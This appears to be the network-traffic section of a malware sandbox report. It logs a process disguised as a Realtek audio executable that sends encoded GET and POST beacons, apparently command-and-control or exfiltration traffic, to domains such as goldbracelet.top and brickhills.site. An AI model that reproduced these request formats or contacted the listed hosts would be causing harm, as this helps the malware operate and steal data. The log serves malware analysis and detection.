                                                                                                                                                                                                                                Dec 3, 2024 14:53:30.117734909 CET874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:53:29 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234009.7981421; expires=Fri, 01-Dec-2034 13:53:29 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                32192.168.11.2049791103.224.182.242807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.610766888 CET422OUTGET /vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0= HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.805866003 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:53:32 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234012.2878163; expires=Fri, 01-Dec-2034 13:53:32 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-length: 1501
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 2f 76 77 6e 32 2f 3f 5a 31 45 4f 3d 4f 76 66 48 65 6c 75 55 79 26 70 6c 75 78 56 6d 3d 38 62 39 52 4b 74 51 53 42 48 48 30 37 50 78 74 59 73 69 70 6a 4c 2f 6c 71 66 58 71 59 58 2b 6a 51 6d 41 5a 61 77 39 47 52 4f 48 47 59 56 37 34 4d 75 37 78 59 35 72 55 55 47 62 42 53 33 35 6c 50 79 48 74 48 50 51 44 2b 38 56 50 6e 62 6a 75 32 48 74 78 5a 66 63 79 75 71 4d 7a 6a 51 6f 41 46 6d 6d 35 38 73 61 39 4f 58 77 65 38 68 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <html><head><title>brickhills.site</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: non [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.805881977 CET484INData Raw: 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 2f 76 77 6e 32 2f 3f 5a 31 45 4f 3d 4f 76 66 48 65 6c 75 55 79 26 70 6c 75 78 56 6d 3d 38 62 39 52 4b 74 51 53 42 48 48 30 37 50 78 74 59 73 69
                                                                                                                                                                                                                                Data Ascii: a href='http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0=&fp=-3'>Click here to enter</a></div><noscript><meta http-e


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                33192.168.11.2049792172.67.201.49807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.224631071 CET692OUTPOST /qrpv/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.goldbracelet.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.goldbracelet.top
                                                                                                                                                                                                                                Referer: http://www.goldbracelet.top/qrpv/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 62 67 2f 55 49 45 75 32 50 30 6b 78 54 7a 72 39 2f 4a 65 35 4f 58 78 41 57 4a 73 59 34 41 6e 41 6f 6f 46 79 36 52 35 36 2f 48 41 71 6f 76 52 6a 2b 34 6a 38 70 58 68 4e 43 45 42 71 4b 76 6e 6f 6d 68 6b 78 76 49 71 63 59 45 65 47 75 77 65 34 52 48 52 33 4f 47 6a 73 4b 4a 70 55 4d 4b 74 50 46 43 4a 49 69 46 35 78 69 79 57 31 4e 55 30 49 35 4a 57 77 37 61 6e 46 64 46 6e 44 72 31 6c 75 68 50 56 4f 67 4c 69 36 52 54 2f 33 6d 6c 79 53 32 72 52 6d 55 54 66 4a 4d 45 31 6e 58 32 34 64 52 67 62 74 32 57 2f 65 69 45 47 4e 4d 6b 34 6b 77 4d 46 7a 55 32 39 43 68 6f 45 52 52 36 76 41 63 51 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=bg/UIEu2P0kxTzr9/Je5OXxAWJsY4AnAooFy6R56/HAqovRj+4j8pXhNCEBqKvnomhkxvIqcYEeGuwe4RHR3OGjsKJpUMKtPFCJIiF5xiyW1NU0I5JWw7anFdFnDr1luhPVOgLi6RT/3mlyS2rRmUTfJME1nX24dRgbt2W/eiEGNMk4kwMFzU29ChoERR6vAcQ==
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.363487005 CET916INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:46 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONeeRoabhrNsJJhgdNF9R3wL3UE7ON6xRxKxvuOUFjoMUehqYhaGj3iFTc6tENmViJNABpc9iUmHIUfxNi%2BfyPaxS5GEoiZ3gQUFIHJ3f5cp6lRi4bKF5Kf5IICJHDiFBycduC9AVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ec40b783c4143c9-EWR
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=102805&min_rtt=102805&rtt_var=51402&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=692&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a
                                                                                                                                                                                                                                Data Ascii: 6d(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.363590002 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                34192.168.11.2049793172.67.201.49807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.855215073 CET712OUTPOST /qrpv/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.goldbracelet.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.goldbracelet.top
                                                                                                                                                                                                                                Referer: http://www.goldbracelet.top/qrpv/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 62 67 2f 55 49 45 75 32 50 30 6b 78 53 53 62 39 39 71 6d 35 4a 33 78 44 5a 70 73 59 33 67 6d 4a 6f 6f 4a 79 36 51 38 39 2f 56 55 71 70 50 42 6a 35 38 58 38 75 58 68 4e 4d 6b 42 72 46 50 6e 68 6d 68 6f 50 76 4e 43 63 59 45 36 47 75 31 69 34 51 30 4a 34 4f 57 6a 79 46 70 70 61 43 71 74 50 46 43 4a 49 69 46 74 62 69 79 4f 31 4e 6c 45 49 35 6f 57 7a 36 61 6e 4b 4d 46 6e 44 67 56 6c 71 68 50 55 64 67 4b 2f 64 52 52 48 33 6d 67 4f 53 33 36 52 68 62 54 66 4c 43 6b 31 7a 53 57 56 79 65 51 33 4e 37 58 66 7a 6e 57 57 36 4e 79 31 2b 74 2b 78 58 58 6c 68 77 6c 59 39 35 54 34 75 62 42 61 53 30 53 32 62 47 58 49 5a 30 39 46 4f 6f 79 4d 42 6a 38 44 73 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=bg/UIEu2P0kxSSb99qm5J3xDZpsY3gmJooJy6Q89/VUqpPBj58X8uXhNMkBrFPnhmhoPvNCcYE6Gu1i4Q0J4OWjyFppaCqtPFCJIiFtbiyO1NlEI5oWz6anKMFnDgVlqhPUdgK/dRRH3mgOS36RhbTfLCk1zSWVyeQ3N7XfznWW6Ny1+t+xXXlhwlY95T4ubBaS0S2bGXIZ09FOoyMBj8Ds=
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.988478899 CET922INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:48 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5XxtAP1KZgtxTkAjy8mtLYFaG9eSo0eGmy8AAmKSOXHeb3SBaTfqnvRix%2FOdf%2F%2FD84HlRaNnZujrV0Ob01l2ujWtw7MoynFLFycsSPKgn0Y%2FtT3pzegW9pfZNUnQ9tYssE7Wxy1Zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ec40b88ad50de97-EWR
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=102703&min_rtt=102703&rtt_var=51351&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a
                                                                                                                                                                                                                                Data Ascii: 6d(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.988488913 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                35192.168.11.2049794172.67.201.49807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.480022907 CET2578OUTPOST /qrpv/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.goldbracelet.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.goldbracelet.top
                                                                                                                                                                                                                                Referer: http://www.goldbracelet.top/qrpv/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 62 67 2f 55 49 45 75 32 50 30 6b 78 53 53 62 39 39 71 6d 35 4a 33 78 44 5a 70 73 59 33 67 6d 4a 6f 6f 4a 79 36 51 38 39 2f 56 73 71 6f 38 35 6a 35 64 58 38 76 58 68 4e 53 30 42 32 46 50 6d 6a 6d 68 78 49 76 4e 4f 4d 59 47 53 47 73 58 61 34 5a 6c 4a 34 58 6d 6a 79 48 70 70 58 4d 4b 74 67 46 43 5a 55 69 46 39 62 69 79 4f 31 4e 6e 4d 49 2b 35 57 7a 33 36 6e 46 64 46 6e 48 72 31 6c 4f 68 50 4e 6f 67 4b 72 6e 52 68 6e 33 6c 41 2b 53 78 49 4a 68 53 54 66 46 46 6b 30 30 53 57 5a 74 65 51 72 42 37 55 44 5a 6e 56 32 36 4e 31 49 34 70 2f 73 4e 41 58 5a 75 2f 62 52 39 53 62 7a 51 50 34 79 74 63 31 6e 52 59 65 42 64 30 48 43 66 75 39 67 6b 75 6b 6d 68 62 64 4b 72 73 2f 62 31 4c 35 45 77 30 51 4d 2f 39 71 73 5a 6e 69 48 38 68 31 57 52 53 63 68 75 43 4e 77 37 4b 42 53 51 47 51 55 30 7a 4a 47 47 76 46 4d 62 65 41 65 65 41 6b 4a 36 51 72 43 51 39 7a 42 6f 44 6d 33 2b 39 77 64 68 72 41 75 4c 65 56 6d 51 31 47 32 56 77 35 39 57 6c 35 4f 44 45 50 74 51 4b 77 2f 4f 70 53 6f 5a 35 79 69 6d 57 30 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=bg/UIEu2P0kxSSb99qm5J3xDZpsY3gmJooJy6Q89/Vsqo85j5dX8vXhNS0B2FPmjmhxIvNOMYGSGsXa4ZlJ4XmjyHppXMKtgFCZUiF9biyO1NnMI+5Wz36nFdFnHr1lOhPNogKrnRhn3lA+SxIJhSTfFFk00SWZteQrB7UDZnV26N1I4p/sNAXZu/bR9SbzQP4ytc1nRYeBd0HCfu9gkukmhbdKrs/b1L5Ew0QM/9qsZniH8h1WRSchuCNw7KBSQGQU0zJGGvFMbeAeeAkJ6QrCQ9zBoDm3+9wdhrAuLeVmQ1G2Vw59Wl5ODEPtQKw/OpSoZ5yimW0mdXYOR6cujjqasjWEUXAn9aW2RT0/PZ5v6qxYwiugt2yss+8+J9Z9fwLGfPw8+3Fhhg81oHbM9uZ1+0nIoZLhmi3hrYhvBeYyJQe8ACsljDmt9zRPgRrt3LiNThDitenbejLL/emSdBLZijy//tFdo6Il8RFqVo2Y8CnJvccCDVkCR3JrbshoqmCQWagYjsD2KHAenmAXzLaZktVr+xcvnrq434Tsv66ER4Y3+v4RfkaQpIo/UPry30VLUzGSXwZwFfHMTK2Ij3C3aMQqr7GOKh1piVZZmM2cPvm7TKBdNW1KHZyA6TQR7Vd7L1pA2lIUbmVF7VZiL60IZi99dcAXp0/dX4JpbSPYVt++Oc6ugeOrvBRcjC/DTUowVSziemnYmQLQ3Es6KHfBt8ihtrzA1R27QtgQH/+uf/mKUbsQ/SjzP5gw/CxsX6yZBRr2nNLTFAyzRXcoHueLTujpwsmbPTVQVRCjynoUczcpjguidJMgax72WiiHbOvmK6UFZtUG3sXuPz8cDOVwMylTr0DAshMiGNDvWv9AOsR2fwd5RnExw83b1Jk3iQPuT/wovN9DDlhqSGisqo0XnOmINorjDv9LeZWBgHRTXau1lN/IE20fDT8LACM1I9bNxeEUWUUx6m2VKRadsHdu6b535K3UDuPq+TQgXHmbKN [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.480047941 CET5156OUTData Raw: 61 39 4e 63 57 74 78 45 65 38 37 4d 46 33 67 6c 76 6b 31 58 41 46 4a 78 72 49 4a 73 32 6f 46 61 4f 6a 44 48 55 5a 55 73 6b 73 6f 4e 71 76 46 62 4a 7a 59 6f 4a 65 6b 79 2b 5a 51 59 47 71 72 54 30 75 68 41 33 44 6b 78 6c 55 32 63 6c 75 63 77 52 72
                                                                                                                                                                                                                                Data Ascii: a9NcWtxEe87MF3glvk1XAFJxrIJs2oFaOjDHUZUsksoNqvFbJzYoJeky+ZQYGqrT0uhA3DkxlU2clucwRr8Zv7En9edKU8w1ApeA6nKKxM2/PLSJOAciFZcqnFxj45FnU2rmGL+VrOqHcd/LkQGgNCnotLW2XWpr3ZCv2zAlXvsmDQufw8ERs2k7ZT0+nxt7E3aJDXIK8CGp5hwCsHwUPqyTmL7m284ti9uFWN6rGzssWWlPzay
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.480120897 CET127OUTData Raw: 38 78 33 6d 35 4e 43 43 71 75 31 6f 36 59 44 36 39 68 44 42 4f 57 68 5a 74 33 78 64 42 2f 77 53 4f 71 32 39 79 35 49 35 41 75 36 70 6c 44 56 73 52 69 33 6c 70 53 7a 55 4c 5a 53 7a 53 63 79 58 6b 6f 4b 48 74 35 4d 58 63 2b 68 6a 44 6a 66 76 6f 4c
                                                                                                                                                                                                                                Data Ascii: 8x3m5NCCqu1o6YD69hDBOWhZt3xdB/wSOq29y5I5Au6plDVsRi3lpSzULZSzScyXkoKHt5MXc+hjDjfvoL0nFjBn5zj0yCCNaNclToJyM16a25Yf2rSR9Bbx4v1aA==
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.624552011 CET927INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:51 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8C%2F9sTr3ONQ4CfGEP5rT6wQlo10UdzNLgGgcczkSoWInLFix4%2FssDoQQDb13lKr6oSbecX7GxlZDglKH%2BZIgd4kDMCJQwUr3h3hY5p3I4ZEoAIb%2FACKLcwwHVAEL%2BS%2FQ1PYM22rFAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ec40b99082b19cf-EWR
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=103063&min_rtt=103063&rtt_var=51531&sent=3&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7861&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a
                                                                                                                                                                                                                                Data Ascii: 6d(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.624597073 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                36192.168.11.2049795172.67.201.49807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.103291988 CET423OUTGET /qrpv/?Z1EO=OvfHeluUy&pluxVm=WiX0LzPqOnM4b37+7/q2MnJgJJwmlCG/8poUwA5NsFkBp/VurdzYoSVVPF8rA/Ka5BkZn+mZS0ORkGe6TXFOOAiLIJoZGeMwExFXk2ddigf2T3UmxoiawIQ= HTTP/1.1
                                                                                                                                                                                                                                Host: www.goldbracelet.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.362303019 CET935INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:54 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJ6HVhxQIol6eeLbu15eF0NUhkrFETNzTO3a%2FwcIQVbYIGqhiwLO7n%2BRu0Hl1JKNDeoMj0SG4HUUAvT00IlCas1HlqMQsYpnFtHBQqMFK4IZUg%2FZO9VO0t1xSnAg3z%2B60n57FtbaTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ec40ba97a144379-EWR
                                                                                                                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=103071&min_rtt=103071&rtt_var=51535&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=423&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
